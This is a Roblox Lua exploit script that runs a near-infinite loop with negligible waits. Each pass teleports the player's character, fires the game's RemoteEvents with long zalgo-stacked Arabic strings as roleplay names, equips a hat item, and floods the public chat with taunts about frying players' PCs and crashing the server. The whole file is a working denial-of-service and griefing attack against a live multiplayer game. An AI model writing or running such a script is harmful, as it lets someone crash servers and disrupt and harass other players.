for i = 1, 9999999999999999, 1 do
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-123, 51, -173))
local A_1 = "RPName"
local A_2 = "ه̷̯̓ ل̴̡̿ ̸̻͝ك̵̜͐ل̶̬̍   ̴͎̍zaxx ب̴̝̈́ك̷̥̚ ̵̦͘ل̴͑ͅzaxxط̷͍̇  ̷̹́ ي"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-242, 51, -179))
local A_1 = "RPName"
local A_2 = "ف̶̜̀  ̸̛̥ج̵̫͌د̵̷ً̩̝̈́͛ا̵̲͐ ̷̜̋ه̵̮̾   ل̶̡̉ ̶͈̅ي̴̲͘م̴̳̔ ̷̫͛ك̷̺̀ن̴̐͜ن̶̺͂ ̴̛̻  ي̴̬͑ ̵̓͜م̶̲͆","م̶̹͆    ر̴̙͑ح̶̭̉ب̸̧̈ ا̸̵ً͇̻̌͠ ̶̻̈́ي̵͉͛ا̷̹̋ن̴̗̏ا̶̧̌ ̷̡̃   ن̶̲́  ت"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-197, 52, -89))
local A_1 = "RPName"
local A_2 = " ن̶̲́xج̵̒ͅي̸̙̇ا̸̢̅ل̴̘̎ف̷̩̃   و̵̛̤ل̷̦̐ ̴͕̓ا̵̛̠ل̶̤͑س̴̹̚و̵̯͐د̵̩̕     ا̸͎̂ن̷͛ͅي̶̙͆ ̶̻̿ه̷̱͐ذ̷̛͖ه̸̭͊","د̶̯̌ع̵͚̓ن̵̣̿ا̷̫̓ ̶͍̉ن̴̲͛ذ̸̟͝ه̸̜̈ب̸͇̋ ̵̗͛إ̶̣͌    ل̸̢͆    ل̵̮́ح̷̠͘ ̸̡̒"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
local A_1 = "RPName"
local A_2 = " ن̶̲́  ت̵̗̈́     ز̶̮͆و̴̐͜ج̷̱̚","م̸̛͕ر̵̼̀ح̸̤̊ب̸̗́ا̴͖̓ ̶͚̒ن̴̗̏ا̶̌z̡̃ ن̶̲́  ت̵̗̈́     ز̶̮͆و̴̐͜ج̷̱̚","م̸̵̛͕̼̀ح̤̮́ح̷̠͘ ̸̡̒"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-180, 51, -140))
local A_1 = "RPName"
local A_2 = " ن̶̲́  ت̵ ي̵͉͘ف̶̜̀  ̸̛̥ج̵̫͌د̵̷ً̩̝̈́͛ا̵̲͐ ̷̜̋ه̵̮̾   ل̶̡̉ ̶͈̅ي̴̲͘م̴̳̔ ̷̫͛ك̷̺̀ن̴̐͜ن̶̺͂ ̴̛̻  ي̴̬͑ ̵̓͜م̶̲͆","م̶̹͆    ر̴̙͑ح̶̭̉ب̸̧̈ ا̸̵ً͇̻̌͠ ̶̻̈́ي̵͉͛ا̷̹̋ن̴̗̏ا̶̧̌ ̷̡̃   ن̶̲́  ت̵̗̈́     ز̶̮͆و̴̐͜ج̷̱̚","م̸̛͕ر̵̼̀ح̸̤̊ب̸̗́ا̴͖̓ ̶͚̒ا̸͙͑خ̷̹͑ ̶̝̮̐́ح̷̠͘ ̸̡̒"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
local A_1 = "RPName"
local A_2 = " ن̶͚́ا̸͙͑خ̷̹͑ ̶̝̐ي̷͍̕ ̸̢̀ك̴̫̇ي̴̦̽ ̷͛ͅف̴̟̏ ̸͉̎ا̶͓̔ل̵̮́ح̷̠͘ ̸̡̒ا̸̱͠ل̷̨̈́ ̵͉̿ه̴̢͆ ̶͙͂ه̵̗̓ه̸̲͒ ̴̛̜ه̶̟̃","ه̴̨͝ل̴͖̕ ̶̙̂ي̷̱̂م̶̜̈́ ز̶̮͆و̻ض̶͓̔ل̵̮́ح̷̠͘ ̸̡̒"
local Event = game:GetService("ReplicatedStorage").NetworkEvent
Event:FireServer(A_1, A_2)
wait(0.000000000001)
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-102, 51, -83))
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Lol your pc got noob on by Zaxx# /00 01/",'All')
wait(0.01)
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Zaxx the best <.3",'All')
wait(0.01)
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Damn man your pc getting fried",'All')
wait(0.01)
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Say bye to your serveerrrrrrr",'All')
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-167, 52, -92))
    local A_1 = 
{
	[1] = "Wear", 
	[2] = "1074738432", 
	[3] = "Hats"
}
local Event = game:GetService("ReplicatedStorage").WearItem
Event:FireServer(A_1)
end
